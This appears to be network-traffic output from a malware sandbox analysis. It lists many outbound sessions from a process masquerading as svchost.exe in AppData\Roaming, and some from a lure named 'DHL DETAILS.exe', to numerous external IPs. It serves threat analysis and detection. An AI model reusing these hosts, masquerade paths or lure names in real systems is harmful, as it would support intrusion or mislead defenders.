                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6635192.168.2.560951200.10.73.210567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6636192.168.2.560032142.54.236.97414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6637192.168.2.56441362.152.53.186890956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6638192.168.2.560980139.162.181.1776084443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6639192.168.2.55882692.204.135.2032921243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6640192.168.2.5609903.10.93.50312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6641192.168.2.5609438.219.228.1001567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6642192.168.2.56100693.190.142.572654143220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6643192.168.2.56099920.206.106.1928043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6644192.168.2.557711147.124.212.311107043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6645192.168.2.56450734.84.95.189808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6646192.168.2.5611958.218.231.621567343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6647192.168.2.557632148.72.23.56326043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6648192.168.2.55690945.124.113.6950043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6649192.168.2.56127146.17.63.166444443220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6650192.168.2.55759351.222.241.86291643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6651192.168.2.561549107.181.161.81414543220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6652192.168.2.56129751.38.63.1242729443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6653192.168.2.561408172.67.181.1078043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6654192.168.2.56120143.133.70.571567343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6655192.168.2.559800111.16.50.12900243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6656192.168.2.56125745.227.193.166808043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6657192.168.2.558896128.199.196.313883243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6658192.168.2.56150847.184.175.164312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6659192.168.2.56152552.35.240.119108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6660192.168.2.559940139.162.238.1842987043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6661192.168.2.56449891.134.140.1605732043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6662192.168.2.56096662.171.133.66312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6663192.168.2.560656117.160.250.133889943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6664192.168.2.557487163.172.149.1331637943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6665192.168.2.561418104.145.235.200312843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6666192.168.2.56456978.128.81.2203162343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6667192.168.2.56145272.210.221.197414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6668192.168.2.561693104.17.84.1508056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6669192.168.2.5599268.222.164.2051567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6670192.168.2.561769172.67.206.1058056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6671192.168.2.56172850.63.12.332385956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6672192.168.2.56138347.243.114.192818043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6673192.168.2.561088111.206.0.99818143220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6674192.168.2.56134752.67.10.183312843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6675192.168.2.56157345.81.232.176155356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6676192.168.2.56133077.46.138.373360843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6677192.168.2.561376177.12.118.1608043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6678192.168.2.56183531.43.179.1608056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6679192.168.2.561798104.129.205.945432156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6680192.168.2.560901120.194.4.1578243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6681192.168.2.5617904.236.183.37808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6682192.168.2.561580202.83.102.83808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6683192.168.2.561562202.162.219.10108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6684192.168.2.55973435.209.198.2228043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6685192.168.2.561932162.159.242.1508056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6686192.168.2.562023172.67.53.2158056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6687192.168.2.562054184.169.154.1198056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6688192.168.2.561634171.250.222.13108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    6689192.168.2.562011162.214.227.6855392
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6690192.168.2.56194112.186.205.1208056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6691192.168.2.56161652.172.1.186312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6692192.168.2.560924117.160.250.163999943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6693192.168.2.562058142.54.236.97414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6694192.168.2.56190444.190.9.654810056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6695192.168.2.557146148.66.130.532399843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6696192.168.2.561993129.213.150.2058056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6697192.168.2.557875115.89.203.598043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6698192.168.2.56181545.81.232.17916556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6699192.168.2.557653180.180.218.250808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6700192.168.2.557754103.180.123.141808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6701192.168.2.557307181.209.78.7599943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6702192.168.2.557774103.48.69.1138243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6703192.168.2.55794723.94.214.8905443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6704192.168.2.56180543.131.246.771567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6705192.168.2.560086198.57.195.423824243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6706192.168.2.561702193.151.130.114808656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6707192.168.2.562082192.154.244.92900056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6708192.168.2.56184291.189.177.190312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6709192.168.2.560312147.124.212.313047943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6710192.168.2.564653181.129.183.195328143080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6711192.168.2.561829185.49.31.207808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6712192.168.2.559888192.252.208.701428243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6713192.168.2.56181347.74.152.29888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6714192.168.2.557874161.97.163.524572543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6715192.168.2.561905185.225.232.1918056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6716192.168.2.561798104.129.205.94543216352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6717192.168.2.562065184.185.2.12414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6718192.168.2.56199415.236.106.236312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6719192.168.2.56204946.35.9.1108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6720192.168.2.56197258.246.58.150900256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6721192.168.2.5617535.44.42.1155838656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6722192.168.2.561936120.78.191.688056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6723192.168.2.562003219.243.212.118844356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6724192.168.2.56019245.11.95.166601243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6725192.168.2.56203713.229.47.1098056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6726192.168.2.56206823.137.248.197888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6727192.168.2.56003569.61.200.1043618143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6728192.168.2.560378115.96.208.124808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6729192.168.2.56053850.63.12.331473843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6730192.168.2.562053203.171.19.988056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6731192.168.2.56037734.23.45.2238043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6732192.168.2.56201865.1.244.232108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6733192.168.2.56207980.67.8.68043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6734192.168.2.5620843.10.93.50312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6735192.168.2.561308111.53.178.249730243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6736192.168.2.56208065.21.255.197312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6737192.168.2.562102162.214.227.686043356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6738192.168.2.56209752.54.249.2418056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6739192.168.2.562239202.159.35.15344356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6740192.168.2.557485117.160.250.132889943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6741192.168.2.56048745.128.133.239108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6742192.168.2.560329161.97.173.425246343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6743192.168.2.56039751.89.173.402331343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6744192.168.2.564672164.92.237.1886372243080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6745192.168.2.562248202.159.35.15344356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6746192.168.2.562251202.159.35.15344356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6747192.168.2.562253202.159.35.15344356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6748192.168.2.557959121.130.172.153312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6749192.168.2.55919818.166.142.180108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6750192.168.2.562087103.49.202.2528056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6751192.168.2.562096203.222.24.368056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6752192.168.2.561958110.93.227.28312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6753192.168.2.56047745.11.95.166600843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6754192.168.2.562165104.20.75.1328056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6755192.168.2.56209943.133.70.571567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6756192.168.2.561647117.160.250.1328056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6757192.168.2.562186192.154.244.92900056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6758192.168.2.560583167.172.159.432284743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6759192.168.2.559246159.65.245.2558043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6760192.168.2.55919472.195.34.59414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6761192.168.2.559771209.97.150.167312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6762192.168.2.55820250.63.12.332549243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6763192.168.2.560925143.198.226.258043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6764192.168.2.56218744.190.9.654810043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6765192.168.2.562244162.215.219.1574811756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6766192.168.2.55802051.15.242.202888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6767192.168.2.560690109.164.38.189230643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6768192.168.2.5622423.12.144.146312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6769192.168.2.56211447.243.114.192818056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6770192.168.2.560876162.214.225.2234955643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6771192.168.2.5621168.222.164.2051567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6772192.168.2.560175104.200.135.46414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6773192.168.2.56470592.204.134.382567556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6774192.168.2.55148674.119.147.20941456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
